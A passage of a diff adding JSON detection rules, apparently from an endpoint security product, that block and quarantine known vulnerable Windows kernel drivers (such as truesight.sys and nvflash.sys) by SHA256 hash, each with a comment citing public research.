+ "hl_testing_start_time": "2026-03-23T11:45:31.808657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c78e4e21776fb14f43641e98a50624497de8039dc22b9514755e3e681a34d4ff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10955731-1fa3-507e-8f4a-1ffe5d6743c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497836Z",
+ "creation_date": "2026-03-23T11:45:31.497839Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497845Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a595e1034665a108a7a7cba263709401d82477aa68187fd6ef3927b4acc2cd07",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10a94906-b49b-542c-b1fa-5dd4e042da16",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142850Z",
+ "creation_date": "2026-03-23T11:45:32.142852Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142857Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8c07b6e2066a5a22a92d9f521ecdeb8c68698c400e4b83e0501b9f340957c22",
+ "comment": "Vulnerable Filseclab Driver (aka fildds.sys, filnk.sys and filwfp.sys) [https://twitter.com/SophosXOps/status/1764933865574207677] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10b1048a-092a-5594-9a4c-6cfcec02a266",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476107Z",
+ "creation_date": "2026-03-23T11:45:30.476116Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476125Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "66a20fc2658c70facd420f5437a73fa07a5175998e569255cfb16c2f14c5e796",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10b3fc3b-bae4-5fec-912e-cdc37b554272",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157456Z",
+ "creation_date": "2026-03-23T11:45:31.157458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c18f564bcbee4723514580fd7741e1883ffbf2e37e9f5b2da5a79033305aaa13",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10b86956-0b58-55aa-862f-a070e96542d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809289Z",
+ "creation_date": "2026-03-23T11:45:31.809292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809301Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e72867adaa4a79dd8d332b3d2e0bf705b76af7c5e8505167c23aa41bac7ce1bb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10db64ef-0c56-54f1-ad29-0ed1f3cfde0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146058Z",
+ "creation_date": "2026-03-23T11:45:31.146060Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146066Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f91769cd61784914bde779fe4cd7520d7e76523bafb9d06cc78d0346bbfaec14",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10ddbeb4-ab0c-5847-bb45-ecda226931f3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480817Z",
+ "creation_date": "2026-03-23T11:45:31.480821Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480828Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ded1bffeb296f566935ea030bf2d02f7d530f01c7a0774383385a5dc3ebf2698",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10e3b176-0cb0-5000-a3de-38d2bfd04722",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477420Z",
+ "creation_date": "2026-03-23T11:45:31.477424Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477433Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1a547472666006fc7a0439a37ccd7b5fce11818460ebcc42b57649e523433c1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10f1af51-06f9-5b96-9ab0-b6578fb9d5ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618322Z",
+ "creation_date": "2026-03-23T11:45:29.618324Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618329Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2d6cdc3d8960a50d9f292bb337b3235956a61e4e8b16cf158cb979b777f42aa",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10f449c9-caa2-5655-83b9-f7627e07ff04",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972664Z",
+ "creation_date": "2026-03-23T11:45:29.972666Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972671Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54e969dc477af9a3e5b53dc4edaebc41a7b73c87ecca13dc1fbb8dfc86c0fd78",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10f5c81d-f3e1-56d3-a12d-8948caf2974b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812945Z",
+ "creation_date": "2026-03-23T11:45:31.812955Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812963Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd68e81f338b91c2381dcd1e37f4c4e5649acad687608d9dbc1fa8fe24c346b8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "110574b3-e699-5994-b4ac-07b492b2a088",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983193Z",
+ "creation_date": "2026-03-23T11:45:29.983195Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983201Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "708016fbe22c813a251098f8f992b177b476bd1bbc48c2ed4a122ff74910a965",
+ "comment": "Vulnerable Kernel Driver (aka b3.sys) [https://www.loldrivers.io/drivers/adfb015a-f453-4b9e-a247-50f146209eb0/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "110d6a55-ff1e-5067-bd87-3d6e9647f0b4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813777Z",
+ "creation_date": "2026-03-23T11:45:31.813781Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813790Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ef5103072db29437d68eb24998bdc7b15533d2fe8108929acb1dff805c91a7a0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "11143612-92a8-507a-a673-9e78fb38ea0a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160322Z",
+ "creation_date": "2026-03-23T11:45:31.160324Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160332Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "97cadcc0170ca3d521d2018628050caab2f27ef2f181180c74c2ab25277941ee",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "11145577-5d08-5c7d-a685-2862d84bc823",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619194Z",
+ "creation_date": "2026-03-23T11:45:29.619196Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619202Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52",
+ "comment": "Super Micro Computer physmem tool (aka phymem64.sys)",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "111af200-3ecc-5a57-9ad3-f4177ce37d4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833838Z",
+ "creation_date": "2026-03-23T11:45:30.833841Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833850Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6236bddd0fa696e9364fac7f0fa5ae38e9c76adf6d6fc504f8f8aae6d7ae03f2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "111fd345-cb8a-5920-b1fa-fa050c873e28",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159330Z",
+ "creation_date": "2026-03-23T11:45:31.159332Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159337Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4594fa9bf1a89b5542345f20ac7dac79fd1afa4cc6ff494fe9249973ec9d0c8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "113a3840-45cf-539c-93a5-a5b4544cb9c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498010Z",
+ "creation_date": "2026-03-23T11:45:31.498013Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498021Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "84425276857168c194eba0c8cd74ff58ddf229bea91fb0392ae66a452c0e79e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "113caa7c-92cc-52a4-938c-11c59c12a02d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826764Z",
+ "creation_date": "2026-03-23T11:45:30.826767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "98d8b701a2a49ad621ea9ef4f4776ffab02570a4df4f9cc9f3ce14a307fe7939",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "116068d4-af1f-53c9-abe9-0c680455dca4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156638Z",
+ "creation_date": "2026-03-23T11:45:31.156639Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156645Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76219892d1b31c3be29dc56b66a296de68da0019e636aaae64fce74401d0a924",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "11756f25-3436-56b1-81b3-e763ab782bc6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812472Z",
+ "creation_date": "2026-03-23T11:45:31.812474Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812480Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5cbf39a275265519ae5f8260f031f9e5a3a2f1eae333742ed49f0cc61a5e60a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "11793f33-ef97-518d-a6df-c8ccfc0c5f06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824042Z",
+ "creation_date": "2026-03-23T11:45:30.824045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824050Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "361afe55e0a6f5f911fe1b3445c56a5287b26ec735073d2e28e17b8bf8d4b4b9",
